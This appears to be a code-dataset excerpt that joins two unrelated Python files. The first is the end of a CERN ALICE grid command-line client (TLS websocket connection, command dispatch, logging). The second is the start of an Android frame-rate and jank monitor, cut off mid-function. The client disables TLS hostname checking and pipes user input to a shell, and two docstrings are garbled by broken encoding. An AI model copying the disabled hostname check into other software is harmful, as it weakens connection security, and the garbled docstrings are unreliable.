if not IsValidCert(cert):
msg = f'Invalid user certificate!! Check the content of {cert}'
print_err(msg)
logging.info(msg)
sys.exit(129)
AlienSessionInfo['use_usercert'] = True
if _DEBUG: logging.debug(f"Cert = {cert}; Key = {key}; Creating SSL context .. ")
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
# try:
# ctx.set_ciphers('DEFAULT@SECLEVEL=1') # Server uses only 80bit (sigh); set SECLEVEL only for newer than EL7
# except ssl.SSLError:
# pass
ctx.options |= ssl.OP_NO_SSLv3
ctx.verify_mode = ssl.CERT_REQUIRED # CERT_NONE, CERT_OPTIONAL, CERT_REQUIRED
ctx.check_hostname = False
if _DEBUG: logging.debug("SSL context:: Load verify locations")
ca_verify_location = get_ca_path()
if os.path.isfile(ca_verify_location):
ctx.load_verify_locations(cafile = ca_verify_location)
else:
ctx.load_verify_locations(capath = ca_verify_location)
if _DEBUG: logging.debug("SSL context:: Load certificate chain (cert/key)")
ctx.load_cert_chain(certfile=cert, keyfile=key)
if _DEBUG: logging.debug("SSL context done.")
return ctx
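# The resulting context is handed to websockets.connect() in wb_create below, e.g.:
#   ctx = create_ssl_context()                    # token credentials, when present and valid
#   ctx = create_ssl_context(use_usercert = True) # force usercert/userkey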
@syncify
async def wb_create(host: str = 'localhost', port: Union[str, int] = '0', path: str = '/', use_usercert: bool = False, localConnect: bool = False):
"""Create a websocket to wss://host:port/path (it is implied a SSL context)"""
QUEUE_SIZE = int(128) # maximum length of the queue that holds incoming messages
MSG_SIZE = None # int(20 * 1024 * 1024) # maximum size for incoming messages in bytes. The default value is 1 MiB. None disables the limit
PING_TIMEOUT = int(os.getenv('ALIENPY_TIMEOUT', '20')) # If the corresponding Pong frame isn't received within ping_timeout seconds, the connection is considered unusable and is closed
PING_INTERVAL = PING_TIMEOUT # Ping frame is sent every ping_interval seconds
CLOSE_TIMEOUT = int(10) # maximum wait time in seconds for completing the closing handshake and terminating the TCP connection
# https://websockets.readthedocs.io/en/stable/api.html#websockets.protocol.WebSocketCommonProtocol
# we use some conservative values; higher than this might hurt the sensitivity to interruptions
wb = None
ctx = None
# client_max_window_bits = 12, # tomcat endpoint does not allow anything other than 15, so let's just choose a mem default towards speed
deflateFact = _wb_permessage_deflate.ClientPerMessageDeflateFactory(compress_settings={'memLevel': 4},)
headers_list = []
headers_list.append(('User-Agent', f'alien.py/{ALIENPY_VERSION_STR} websockets/{websockets.__version__}'))
if localConnect:
fHostWSUrl = 'ws://localhost/'
logging.info(f"Request connection to : {fHostWSUrl}")
socket_filename = f'{_TMPDIR}/jboxpy_{str(os.getuid())}.sock'
try:
wb = await websockets.unix_connect(socket_filename, fHostWSUrl,
max_queue=QUEUE_SIZE,
max_size=MSG_SIZE,
ping_interval=PING_INTERVAL,
ping_timeout=PING_TIMEOUT,
close_timeout=CLOSE_TIMEOUT,
extra_headers=headers_list
)
except Exception as e:
msg = 'Could NOT establish connection (local socket) to {0}\n{1}'.format(socket_filename, e)
logging.error(msg)
print_err(f'{msg}\nCheck the logfile: {_DEBUG_FILE}')
return None
else:
fHostWSUrl = f'wss://{host}:{port}{path}' # connection URL
ctx = create_ssl_context(use_usercert) # will check validity of token and if invalid cert will be usercert
logging.info(f"Request connection to : {host}:{port}{path}")
socket_endpoint = None
# https://async-stagger.readthedocs.io/en/latest/reference.html#async_stagger.create_connected_sock
# AI_* flags --> https://linux.die.net/man/3/getaddrinfo
try:
if _DEBUG:
logging.debug(f"TRY ENDPOINT: {host}:{port}")
init_begin = datetime.datetime.now().timestamp()
if os.getenv('ALIENPY_NO_STAGGER'):
socket_endpoint = socket.create_connection((host, int(port)))
else:
socket_endpoint = await async_stagger.create_connected_sock(host, int(port), async_dns=True, resolution_delay=0.050, detailed_exceptions=True)
if _DEBUG:
init_delta = (datetime.datetime.now().timestamp() - init_begin) * 1000
logging.debug(f"TCP SOCKET DELTA: {init_delta:.3f} ms")
except Exception as e:
msg = 'Could NOT establish connection (TCP socket) to {0}:{1}\n{2}'.format(host, port, e)
logging.error(msg)
print_err(f'{msg}\nCheck the logfile: {_DEBUG_FILE}')
return None
if socket_endpoint:
socket_endpoint_addr = socket_endpoint.getpeername()[0]
socket_endpoint_port = socket_endpoint.getpeername()[1]
logging.info(f"GOT SOCKET TO: {socket_endpoint_addr}")
try:
if _DEBUG: init_begin = datetime.datetime.now().timestamp()
wb = await websockets.connect(fHostWSUrl, sock = socket_endpoint, server_hostname = host, ssl = ctx,
extensions=[deflateFact, ],
max_queue=QUEUE_SIZE,
max_size=MSG_SIZE,
ping_interval=PING_INTERVAL,
ping_timeout=PING_TIMEOUT,
close_timeout=CLOSE_TIMEOUT,
extra_headers=headers_list
)
if _DEBUG:
init_delta = (datetime.datetime.now().timestamp() - init_begin) * 1000
logging.debug(f"WEBSOCKET DELTA: {init_delta:.3f} ms")
except Exception as e:
msg = 'Could NOT establish connection (WebSocket) to {0}:{1}\n{2}'.format(socket_endpoint_addr, socket_endpoint_port, e)
logging.error(msg)
print_err(f'{msg}\nCheck the logfile: {_DEBUG_FILE}')
return None
if wb: logging.info(f"CONNECTED: {wb.remote_address[0]}:{wb.remote_address[1]}")
return wb
def wb_create_tryout(host: str = 'localhost', port: Union[str, int] = '0', path: str = '/', use_usercert: bool = False, localConnect: bool = False):
"""WebSocket creation with tryouts (configurable by env ALIENPY_CONNECT_TRIES and ALIENPY_CONNECT_TRIES_INTERVAL)"""
wb = None
nr_tries = 0
init_begin = init_delta = None
if _TIME_CONNECT or _DEBUG: init_begin = datetime.datetime.now().timestamp()
connect_tries = int(os.getenv('ALIENPY_CONNECT_TRIES', '3'))
connect_tries_interval = float(os.getenv('ALIENPY_CONNECT_TRIES_INTERVAL', '0.5'))
while wb is None:
try:
nr_tries += 1
wb = wb_create(host, str(port), path, use_usercert, localConnect)
except Exception as e:
logging.error('{0}'.format(e))
if not wb:
if nr_tries >= connect_tries:
logging.error(f"We tried on {host}:{port}{path} {nr_tries} times")
break
time.sleep(connect_tries_interval)
if wb and init_begin:
init_delta = (datetime.datetime.now().timestamp() - init_begin) * 1000
msg = f'>>> Endpoint total connecting time: {init_delta:.3f} ms'
if _DEBUG: logging.debug(msg)
if _TIME_CONNECT: print_out(msg)
if wb and localConnect:
pid_filename = f'{_TMPDIR}/jboxpy_{os.getuid()}.pid'
writePidFile(pid_filename)
return wb
def AlienConnect(token_args: Union[None, list] = None, use_usercert: bool = False, localConnect: bool = False):
"""Create a websocket connection to AliEn services either directly to alice-jcentral.cern.ch or trough a local found jbox instance"""
jalien_server = os.getenv("ALIENPY_JCENTRAL", 'alice-jcentral.cern.ch') # default value for JCENTRAL
jalien_websocket_port = os.getenv("ALIENPY_JCENTRAL_PORT", '8097') # websocket port
jalien_websocket_path = '/websocket/json'
jclient_env = f'{_TMPDIR}/jclient_token_{str(os.getuid())}'
# let's try to get a websocket
wb = None
if localConnect:
wb = wb_create(localConnect = True)
else:
if not os.getenv("ALIENPY_JCENTRAL") and os.path.exists(jclient_env): # If user defined ALIENPY_JCENTRAL the intent is to set and use the endpoint
# let's check JBox availability
jalien_info = read_conf_file(jclient_env)
if jalien_info:
if is_my_pid(jalien_info['JALIEN_PID']) and isReachable(jalien_info['JALIEN_HOST'], jalien_info['JALIEN_WSPORT']):
jalien_server, jalien_websocket_port = jalien_info['JALIEN_HOST'], jalien_info['JALIEN_WSPORT']
wb = wb_create_tryout(jalien_server, str(jalien_websocket_port), jalien_websocket_path, use_usercert)
# if we still do not have a socket, try to fall back to jcentral, provided we did not have an explicit endpoint and jcentral was not already tried
if wb is None and not os.getenv("ALIENPY_JCENTRAL") and jalien_server != 'alice-jcentral.cern.ch':
jalien_server, jalien_websocket_port = 'alice-jcentral.cern.ch', '8097'
wb = wb_create_tryout(jalien_server, str(jalien_websocket_port), jalien_websocket_path, use_usercert)
if wb is None:
msg = f'Check the logfile: {_DEBUG_FILE}\nCould not get a websocket connection to {jalien_server}:{jalien_websocket_port}'
logging.error(msg)
print_err(msg)
sys.exit(1)
global __SESSION_WB
__SESSION_WB = wb # save the connection as a module-level (global) reference
if AlienSessionInfo['use_usercert']: token(wb, token_args) # if we connect with usercert then let get a default token
return wb
def make_func_map_clean_server():
"""Remove from server list the client-side re-implementations"""
global AlienSessionInfo
del AlienSessionInfo['cmd2func_map_srv']['cd']
list_remove_item(AlienSessionInfo['commandlist'], 'cd')
del AlienSessionInfo['cmd2func_map_srv']['cp']
list_remove_item(AlienSessionInfo['commandlist'], 'cp')
del AlienSessionInfo['cmd2func_map_srv']['ping']
list_remove_item(AlienSessionInfo['commandlist'], 'ping')
del AlienSessionInfo['cmd2func_map_srv']['ps']
list_remove_item(AlienSessionInfo['commandlist'], 'ps')
del AlienSessionInfo['cmd2func_map_srv']['submit']
list_remove_item(AlienSessionInfo['commandlist'], 'submit')
del AlienSessionInfo['cmd2func_map_srv']['token']
list_remove_item(AlienSessionInfo['commandlist'], 'token')
del AlienSessionInfo['cmd2func_map_srv']['user']
list_remove_item(AlienSessionInfo['commandlist'], 'user')
del AlienSessionInfo['cmd2func_map_srv']['cat']
list_remove_item(AlienSessionInfo['commandlist'], 'cat')
del AlienSessionInfo['cmd2func_map_srv']['toXml']
list_remove_item(AlienSessionInfo['commandlist'], 'toXml')
def make_func_map_nowb():
'''client side functions (new commands) that do not require connection to jcentral'''
global AlienSessionInfo
if AlienSessionInfo['cmd2func_map_nowb']: return
AlienSessionInfo['cmd2func_map_nowb']['prompt'] = DO_prompt
AlienSessionInfo['cmd2func_map_nowb']['token-info'] = DO_tokeninfo
AlienSessionInfo['cmd2func_map_nowb']['token-verify'] = DO_tokenverify
AlienSessionInfo['cmd2func_map_nowb']['token-destroy'] = DO_tokendestroy
AlienSessionInfo['cmd2func_map_nowb']['cert-info'] = DO_certinfo
AlienSessionInfo['cmd2func_map_nowb']['cert-verify'] = DO_certverify
AlienSessionInfo['cmd2func_map_nowb']['certkey-match'] = DO_certkeymatch
AlienSessionInfo['cmd2func_map_nowb']['tokenkey-match'] = DO_tokenkeymatch
AlienSessionInfo['cmd2func_map_nowb']['exitcode'] = exitcode
AlienSessionInfo['cmd2func_map_nowb']['$?'] = exitcode
AlienSessionInfo['cmd2func_map_nowb']['version'] = DO_version
AlienSessionInfo['cmd2func_map_nowb']['pfn-status'] = DO_pfnstatus
AlienSessionInfo['cmd2func_map_nowb']['queryML'] = DO_queryML
AlienSessionInfo['cmd2func_map_nowb']['exit'] = DO_exit
AlienSessionInfo['cmd2func_map_nowb']['quit'] = DO_exit
AlienSessionInfo['cmd2func_map_nowb']['logout'] = DO_exit
AlienSessionInfo['cmd2func_map_nowb']['checkAddr'] = DO_checkAddr
make_func_map_nowb() # GLOBAL!! add to the list of client-side no-connection implementations
def make_func_map_client():
'''client side functions (new commands) that DO require connection to jcentral'''
global AlienSessionInfo
if AlienSessionInfo['cmd2func_map_client']: return
# client side function (overrides) with signature : (wb, args, opts)
AlienSessionInfo['cmd2func_map_client']['cd'] = cd
AlienSessionInfo['cmd2func_map_client']['cp'] = DO_XrootdCp
AlienSessionInfo['cmd2func_map_client']['ping'] = DO_ping
AlienSessionInfo['cmd2func_map_client']['ps'] = DO_ps
AlienSessionInfo['cmd2func_map_client']['submit'] = DO_submit
AlienSessionInfo['cmd2func_map_client']['token'] = DO_token
AlienSessionInfo['cmd2func_map_client']['user'] = DO_user
AlienSessionInfo['cmd2func_map_client']['cat'] = DO_cat
AlienSessionInfo['cmd2func_map_client']['toXml'] = DO_2xml
# client side function (new commands) with signature : (wb, args)
AlienSessionInfo['cmd2func_map_client']['quota'] = DO_quota
AlienSessionInfo['cmd2func_map_client']['token-init'] = DO_token_init
AlienSessionInfo['cmd2func_map_client']['pfn'] = DO_pfn
AlienSessionInfo['cmd2func_map_client']['run'] = DO_run
AlienSessionInfo['cmd2func_map_client']['exec'] = DO_exec
AlienSessionInfo['cmd2func_map_client']['getSE'] = DO_getSE
AlienSessionInfo['cmd2func_map_client']['find2'] = DO_find2
AlienSessionInfo['cmd2func_map_client']['dirs'] = DO_dirs
AlienSessionInfo['cmd2func_map_client']['popd'] = DO_popd
AlienSessionInfo['cmd2func_map_client']['pushd'] = DO_pushd
AlienSessionInfo['cmd2func_map_client']['help'] = DO_help
AlienSessionInfo['cmd2func_map_client']['?'] = DO_help
AlienSessionInfo['cmd2func_map_client']['edit'] = DO_edit
AlienSessionInfo['cmd2func_map_client']['mcedit'] = DO_mcedit
AlienSessionInfo['cmd2func_map_client']['nano'] = DO_nano
AlienSessionInfo['cmd2func_map_client']['vi'] = DO_vi
AlienSessionInfo['cmd2func_map_client']['vim'] = DO_vim
AlienSessionInfo['cmd2func_map_client']['SEqos'] = DO_SEqos
AlienSessionInfo['cmd2func_map_client']['less'] = DO_less
AlienSessionInfo['cmd2func_map_client']['more'] = DO_more
AlienSessionInfo['cmd2func_map_client']['lfn2uri'] = DO_lfn2uri
make_func_map_client() # GLOBAL!! add to cmd2func_map_client the list of client-side implementations
def getSessionVars(wb):
"""Initialize the global session variables : cleaned up command list, user, home dir, current dir"""
global AlienSessionInfo
if AlienSessionInfo['user']: return # if the user session variable is already set, just return
if not wb: return
# get the command list just once per session connection (a reconnection will skip this)
ret_obj = SendMsg(wb, 'commandlist', [])
# on the first executed command initialize the following (they will be re-read at each ProcessReceivedMessage)
if not ret_obj.ansdict or 'results' not in ret_obj.ansdict:
print_err('Start session:: could not get command list, let\'s exit.')
sys.exit(1)
regex = re.compile(r'.*_csd$')
AlienSessionInfo['commandlist'] = [cmd["commandlist"] for cmd in ret_obj.ansdict["results"] if not regex.match(cmd["commandlist"])]
AlienSessionInfo['commandlist'].remove('jquota')
AlienSessionInfo['commandlist'].remove('fquota')
# server commands, signature is : (wb, command, args, opts)
for cmd in AlienSessionInfo['commandlist']: AlienSessionInfo['cmd2func_map_srv'][cmd] = SendMsg
make_func_map_clean_server()
# these are aliases, or directly interpreted
AlienSessionInfo['commandlist'].append('ll')
AlienSessionInfo['commandlist'].append('la')
AlienSessionInfo['commandlist'].append('lla')
AlienSessionInfo['commandlist'].extend(AlienSessionInfo['cmd2func_map_client']) # add client-side cmds to list
AlienSessionInfo['commandlist'].extend(AlienSessionInfo['cmd2func_map_nowb']) # add nowb cmds to list
# AlienSessionInfo['commandlist'].sort()
AlienSessionInfo['commandlist'] = sorted(set(AlienSessionInfo['commandlist']))
# when starting a new session prevdir is empty; if it is set, this is a reconnection
if AlienSessionInfo['prevdir'] and (AlienSessionInfo['prevdir'] != AlienSessionInfo['currentdir']): cd(wb, AlienSessionInfo['prevdir'], 'log')
def InitConnection(token_args: Union[None, list] = None, use_usercert: bool = False, localConnect: bool = False):
"""Create a session to AliEn services, including session globals"""
global AlienSessionInfo
init_begin = init_delta = None
if _TIME_CONNECT or _DEBUG: init_begin = datetime.datetime.now().timestamp()
wb = AlienConnect(token_args, use_usercert, localConnect)
if init_begin:
init_delta = (datetime.datetime.now().timestamp() - init_begin) * 1000
msg = f">>> Time for websocket connection: {init_delta:.3f} ms"
if _DEBUG: logging.debug(msg)
if _TIME_CONNECT: print_out(msg)
if wb is not None: AlienSessionInfo['session_started'] = True
getSessionVars(wb) # no matter if command or interactive mode, we need alienHome, currentdir, user and commandlist
if init_begin:
init_delta = (datetime.datetime.now().timestamp() - init_begin) * 1000
msg = f">>> Time for session connection: {init_delta:.3f} ms"
if _DEBUG: logging.debug(msg)
if _TIME_CONNECT: print_out(msg)
return wb
def ProcessInput(wb, cmd: str, args: Union[list, None] = None, shellcmd: Union[str, None] = None) -> RET:
"""Process a command line within shell or from command line mode input"""
global AlienSessionInfo
if not cmd: return RET(1, '', 'ProcessInput:: Empty input')
if args is None: args = []
ret_obj = None
# early command aliases and default flags
if cmd == 'ls': args[0:0] = ['-F']
if cmd == 'll':
cmd = 'ls'
args[0:0] = ['-F', '-l']
if cmd == 'la':
cmd = 'ls'
args[0:0] = ['-F', '-a']
if cmd == 'lla':
cmd = 'ls'
args[0:0] = ['-F', '-l', '-a']
# implement a time command for measurement of sent/recv delay; for the commands above we do not use timing
time_begin = msg_timing = None
if cmd == 'time': # first to be processed is the time token, it will start the timing and be removed from command
if not args or is_help(args): return RET(0, 'Command format: time command arguments')
cmd = args.pop(0)
time_begin = datetime.datetime.now().timestamp()
if cmd in AlienSessionInfo['cmd2func_map_nowb']: # these commands do NOT need wb connection
ret_obj = AlienSessionInfo['cmd2func_map_nowb'][cmd](args)
return ret_obj
opts = '' # let's process special server args
if get_arg(args, '-nokeys'): opts = f'{opts} nokeys'
if get_arg(args, '-nomsg'): opts = f'{opts} nomsg'
if get_arg(args, '-showkeys'): opts = f'{opts} showkeys'
if get_arg(args, '-showmsg'): opts = f'{opts} showmsg'
# We will not check for a websocket connection because: 1. there is a keep-alive mechanism; 2. there is recovery in SendMsg
if cmd in AlienSessionInfo['cmd2func_map_client']: # lookup in the client-side implementations list
ret_obj = AlienSessionInfo['cmd2func_map_client'][cmd](wb, args)
elif cmd in AlienSessionInfo['cmd2func_map_srv']: # lookup in server-side list
ret_obj = AlienSessionInfo['cmd2func_map_srv'][cmd](wb, cmd, args, opts)
if ret_obj is None: return RET(1, '', f"NO RET OBJ!! The command was not found: {cmd} {chr(32).join(args)}")
if time_begin: msg_timing = f">>>ProcessInput time: {(datetime.datetime.now().timestamp() - time_begin) * 1000:.3f} ms"
if shellcmd:
if ret_obj.exitcode != 0: return ret_obj
if not ret_obj.out:
return RET(1, '', f'Command >>>{cmd} {chr(32).join(args)}<<< did not produce output but exitcode == 0')
shell_run = subprocess.run(shellcmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, input=ret_obj.out, encoding='ascii', shell=True) # pylint: disable=subprocess-run-check # env=os.environ default is already the process env
if msg_timing: shell_run.stdout = f'{shell_run.stdout}\n{msg_timing}'
return RET(shell_run.returncode, shell_run.stdout, shell_run.stderr)
if msg_timing: ret_obj = ret_obj._replace(out = f'{ret_obj.out}\n{msg_timing}')
if ret_obj.ansdict and 'timing_ms' in ret_obj.ansdict['metadata']: ret_obj = ret_obj._replace(out = f"{ret_obj.out}\ntiming_ms = {ret_obj.ansdict['metadata']['timing_ms']}")
return ret_obj
def ProcessCommandChain(wb = None, cmd_chain: str = '') -> int:
global AlienSessionInfo, _JSON_OUT, _JSON_OUT_GLOBAL
if not cmd_chain: return int(1)
# translate aliases in place in the whole string
if AlienSessionInfo['alias_cache']:
for alias in AlienSessionInfo['alias_cache']: cmd_chain = cmd_chain.replace(alias, AlienSessionInfo['alias_cache'][alias])
cmdline_list = [str(cmd).strip() for cmd in cmds_split.split(cmd_chain)] # split commands on ; and \n
ret_obj = None
for cmdline in cmdline_list:
if not cmdline: continue
if _DEBUG: logging.info(f'>>> RUN COMMAND: {cmdline}')
if cmdline.startswith('!'): # if shell command, just run it and return
capture_out = True
if '-noout' in cmdline:
cmdline = cmdline.replace(' -noout', '')
capture_out = False
ret_obj = runShellCMD(cmdline, capture_out)
retf_print(ret_obj, 'debug')
continue
# process the input and take care of pipe to shell
input_alien, sep, pipe_to_shell_cmd = cmdline.partition('|')
if not input_alien:
print_out("AliEn command before the | token was not found")
continue
args = shlex.split(input_alien.strip())
cmd = args.pop(0)
_JSON_OUT = _JSON_OUT_GLOBAL # if globally enabled then enable per command
if get_arg(args, '-json'): _JSON_OUT = True # if enabled for this command
print_opts = 'debug json' if _JSON_OUT else 'debug'
if _JSON_OUT and 'json' not in print_opts: print_opts = f'{print_opts} json'
if cmd in AlienSessionInfo['cmd2func_map_nowb']:
ret_obj = AlienSessionInfo['cmd2func_map_nowb'][cmd](args)
else:
if wb is None: wb = InitConnection() # we are doing the connection recovery and exception treatment in AlienConnect()
args.insert(0, '-nokeys') # Disable return of the keys. ProcessCommandChain is used for user-based communication so json keys are not needed
ret_obj = ProcessInput(wb, cmd, args, pipe_to_shell_cmd)
retf_print(ret_obj, print_opts)
if cmd == 'cd': SessionSave()
_JSON_OUT = _JSON_OUT_GLOBAL # reset _JSON_OUT if it's not globally enabled (env var or argument to alien.py)
return ret_obj.exitcode
def JAlien(commands: str = '') -> int:
"""Main entry-point for interaction with AliEn"""
global AlienSessionInfo, _JSON_OUT
import_aliases()
wb = None
# Command mode interaction
if commands:
AlienSessionInfo['exitcode'] = ProcessCommandChain(wb, commands)
return AlienSessionInfo['exitcode']
# Start interactive mode
wb = InitConnection() # we are doing the connection recovery and exception treatment in AlienConnect()
# Begin Shell-like interaction
if _HAS_READLINE:
rl.parse_and_bind("tab: complete")
rl.set_completer_delims(" ")
def complete(text, state):
prompt_line = rl.get_line_buffer()
tokens = prompt_line.split()
results = []
if len(tokens) == 0:
results = [f'{x} ' for x in AlienSessionInfo['commandlist']]
elif len(tokens) == 1 and not prompt_line.endswith(' '):
results = [f'{x} ' for x in AlienSessionInfo['commandlist'] if x.startswith(text)] + [None]
else:
results = lfn_list(wb, text) + [None]
return results[state]
rl.set_completer(complete)
setupHistory() # enable history saving
print_out('Welcome to the ALICE GRID\nsupport mail: adrian.sevcenco@cern.ch\n')
if os.getenv('ALIENPY_PROMPT_DATE'): AlienSessionInfo['show_date'] = True
if os.getenv('ALIENPY_PROMPT_CWD'): AlienSessionInfo['show_lpwd'] = True
if not os.getenv('ALIENPY_NO_CWD_RESTORE'): SessionRestore(wb)
while True:
INPUT = None
prompt = f"AliEn[{AlienSessionInfo['user']}]:{AlienSessionInfo['currentdir']}"
if AlienSessionInfo['show_date']: prompt = f'{datetime.datetime.now().replace(microsecond=0).isoformat()} {prompt}'
if AlienSessionInfo['show_lpwd']: prompt = f'{prompt} local:{Path.cwd().as_posix()}'
prompt = f'{prompt} >'
try:
INPUT = input(prompt)
except EOFError:
exit_message()
if not INPUT: continue
AlienSessionInfo['exitcode'] = ProcessCommandChain(wb, INPUT)
return AlienSessionInfo['exitcode']
def setup_logging():
global _DEBUG_FILE
logging.addLevelName(90, 'STDOUT')
logging.addLevelName(95, 'STDERR')
MSG_LVL = logging.DEBUG if _DEBUG else logging.INFO
line_fmt = '%(levelname)s:%(asctime)s %(message)s'
file_mode = 'a' if os.getenv('ALIENPY_DEBUG_APPEND', '') else 'w'
try:
logging.basicConfig(format = line_fmt, filename = _DEBUG_FILE, filemode = file_mode, level = MSG_LVL)
except Exception:
print_err(f'Could not write the log file {_DEBUG_FILE}; falling back to /tmp')
_DEBUG_FILE = f'/tmp/{os.path.basename(_DEBUG_FILE)}'
pass
try:
logging.basicConfig(format = line_fmt, filename = _DEBUG_FILE, filemode = file_mode, level = MSG_LVL)
except Exception:
print_err(f'Could not write the log file {_DEBUG_FILE}')
logging.getLogger().setLevel(MSG_LVL)
logging.getLogger('websockets').setLevel(MSG_LVL)
# logging.getLogger('websockets.protocol').setLevel(MSG_LVL)
# logging.getLogger('websockets.client').setLevel(MSG_LVL)
if os.getenv('ALIENPY_DEBUG_CONCURENT'):
logging.getLogger('concurrent').setLevel(MSG_LVL)
logging.getLogger('concurrent.futures').setLevel(MSG_LVL)
if os.getenv('ALIENPY_DEBUG_ASYNCIO'):
logging.getLogger('asyncio').setLevel(MSG_LVL)
if os.getenv('ALIENPY_DEBUG_STAGGER'):
logging.getLogger('async_stagger').setLevel(MSG_LVL)
def main():
setup_logging()
signal.signal(signal.SIGINT, signal_handler)
# signal.signal(sig, signal.SIG_DFL) # register the default signal handler usage for a sig signal
global _JSON_OUT, _JSON_OUT_GLOBAL, ALIENPY_EXECUTABLE
# at exit delete all temporary files
atexit.register(cleanup_temp)
ALIENPY_EXECUTABLE = os.path.realpath(sys.argv.pop(0)) # remove the name of the script
_JSON_OUT_GLOBAL = _JSON_OUT = get_arg(sys.argv, '-json')
arg_list_expanded = []
for arg in sys.argv:
for item in shlex.split(arg):
arg_list_expanded.append(item)
sys.argv = arg_list_expanded
if _DEBUG:
ret_obj = DO_version()
logging.debug(f'{ret_obj.out}\n')
if len(sys.argv) > 0 and (sys.argv[0] == 'term' or sys.argv[0] == 'terminal' or sys.argv[0] == 'console'):
import code
term = code.InteractiveConsole(locals = globals())
term.push('jalien = AliEn()')
banner = 'Welcome to the ALICE GRID - Python interpreter shell\nsupport mail: adrian.sevcenco@cern.ch\nAliEn session object is >jalien< ; try jalien.help()'
exitmsg = 'Exiting..'
term.interact(banner, exitmsg)
sys.exit(int(AlienSessionInfo['exitcode'])) # pylint: disable=protected-access
exec_name = Path(ALIENPY_EXECUTABLE).name
verb = exec_name.replace('alien_', '') if exec_name.startswith('alien_') else ''
if verb: sys.argv.insert(0, verb)
cmd_string = ''
if len(sys.argv) > 0 and os.path.isfile(sys.argv[0]):
with open(sys.argv[0]) as input_file:
cmd_string = input_file.read()
else:
cmd_string = ' '.join(sys.argv)
try:
sys.exit(JAlien(cmd_string))
except KeyboardInterrupt as e:
print_out("Received keyboard intrerupt, exiting..")
sys.exit(1)
except Exception as e:
logging.exception("\n\n>>> EXCEPTION <<<", exc_info = True)
logging.error("\n\n")
print_err(f'''{PrintColor(COLORS.BIRed)}Exception encountered{PrintColor(COLORS.ColorReset)}! it will be logged to {_DEBUG_FILE}
Please report the error and send the log file and "alien.py version" output to Adrian.Sevcenco@cern.ch
If the exception is reproducible, including on lxplus, please create a detailed debug report this way:
ALIENPY_DEBUG=1 ALIENPY_DEBUG_FILE=log.txt your_command_line''')
sys.exit(1)
def _cmd(what):
sys.argv = [sys.argv[0]] + [what] + sys.argv[1:]
main()
def cmd_cert_info(): _cmd('cert-info')
def cmd_token_info(): _cmd('token-info')
def cmd_token_destroy(): _cmd('token-destroy')
def cmd_token_init(): _cmd('token-init')
if __name__ == '__main__':
main()
|
fps.py | # -*- coding: utf-8 -*-
'''
@author: look
@copyright: 1999-2020 Alibaba.com. All rights reserved.
@license: Apache Software License 2.0
@contact: 390125133@qq.com
'''
'''FPS monitor
'''
import queue
import datetime
import time
import re
import threading
import os,sys
import copy
import csv
import traceback
BaseDir=os.path.dirname(__file__)
sys.path.append(os.path.join(BaseDir,'../..'))
from mobileperf.common.basemonitor import Monitor
from mobileperf.android.tools.androiddevice import AndroidDevice
from mobileperf.common.log import logger
from mobileperf.common.utils import TimeUtils
from mobileperf.android.globaldata import RuntimeData
class SurfaceStatsCollector(object):
'''Collects surface stats for a SurfaceView from the output of SurfaceFlinger
'''
def __init__(self, device, frequency,package_name,fps_queue,jank_threshold,use_legacy = False):
self.device = device
self.frequency = frequency
self.package_name = package_name
self.jank_threshold = jank_threshold / 1000.0 # the internal timestamps are in seconds
self.use_legacy_method = use_legacy
self.surface_before = 0
self.last_timestamp = 0
self.data_queue = queue.Queue()
self.stop_event = threading.Event()
self.focus_window = None
# queue used to report data to the upper-layer thread
self.fps_queue = fps_queue
def start(self,start_time):
'''Start the SurfaceStatsCollector
'''
if not self.use_legacy_method and self._clear_surfaceflinger_latency_data():
try:
self.focus_window = self.get_focus_activity()
# if self.focus_window contains the character '$' it must be escaped
if self.focus_window.find('$') != -1:
self.focus_window = self.focus_window.replace('$', '\\$')
except:
logger.warn(u'Could not dynamically get the current Activity name; falling back to page_flip full-screen frame rate statistics!')
self.use_legacy_method = True
self.surface_before = self._get_surface_stats_legacy()
else:
logger.debug("dumpsys SurfaceFlinger --latency-clear is none")
self.use_legacy_method = True
self.surface_before = self._get_surface_stats_legacy()
self.collector_thread = threading.Thread(target=self._collector_thread)
self.collector_thread.start()
self.calculator_thread = threading.Thread(target=self._calculator_thread,args=(start_time,))
self.calculator_thread.start()
def stop(self):
'''Stop the SurfaceStatsCollector
'''
if self.collector_thread:
self.stop_event.set()
self.collector_thread.join()
self.collector_thread = None
if self.fps_queue:
self.fps_queue.task_done()
def get_focus_activity(self):
'''Get the focused activity (window) name via "dumpsys window windows"
'''
return self.device.adb.get_focus_activity()
def _calculate_results(self, refresh_period, timestamps):
"""Returns a list of SurfaceStatsCollector.Result.
ไธๅฐๆๆบ็ฌฌไธๅ ็ฌฌไธๅ ๆฐๅญๅฎๅ
จ็ธๅ
"""
frame_count = len(timestamps)
if frame_count ==0:
fps = 0
jank = 0
elif frame_count == 1:
fps = 1
jank = 0
else:
seconds = timestamps[-1][1] - timestamps[0][1]
if seconds > 0:
fps = int(round((frame_count - 1) / seconds))
jank =self._calculate_janky(timestamps)
else:
fps = 1
jank = 0
return fps,jank
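# Illustrative sketch (not part of the original module): a worked example of
# the fps formula used above, with synthetic vsync timestamps in seconds.
@staticmethod
def _demo_fps_formula():
    # 61 frames whose first and last vsync timestamps are 1 second apart:
    timestamps = [[i, i / 60.0] for i in range(61)]
    seconds = timestamps[-1][1] - timestamps[0][1]        # 1.0 s
    return int(round((len(timestamps) - 1) / seconds))    # -> 60 fps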
def _calculate_results_new(self, refresh_period, timestamps):
"""Returns a list of SurfaceStatsCollector.Result.
ไธๅฐๆๆบ็ฌฌไธๅ ็ฌฌไธๅ ๆฐๅญๅฎๅ
จ็ธๅ
"""
frame_count = len(timestamps)
if frame_count ==0:
fps = 0
jank = 0
elif frame_count == 1:
fps = 1
jank = 0
elif frame_count in (2, 3, 4):
seconds = timestamps[-1][1] - timestamps[0][1]
if seconds > 0:
fps = int(round((frame_count - 1) / seconds))
jank = self._calculate_janky(timestamps)
else:
fps = 1
jank = 0
else:
seconds = timestamps[-1][1] - timestamps[0][1]
if seconds > 0:
fps = int(round((frame_count - 1) / seconds))
jank =self._calculate_jankey_new(timestamps)
else:
fps = 1
jank = 0
return fps,jank
def _calculate_jankey_new(self,timestamps):
'''A frame counts as one jank only when both conditions hold:
1) its display FrameTime is more than twice the average draw time of the previous three frames;
2) its display FrameTime is longer than two movie frames (1000ms / 24 * 2 = 83.33ms).
'''
twofilmstamp = 83.3 / 1000.0
tempstamp = 0
# count dropped-frame janks
jank = 0
for index,timestamp in enumerate(timestamps):
# for the first four frames, any frame that takes more than 166ms counts as a jank
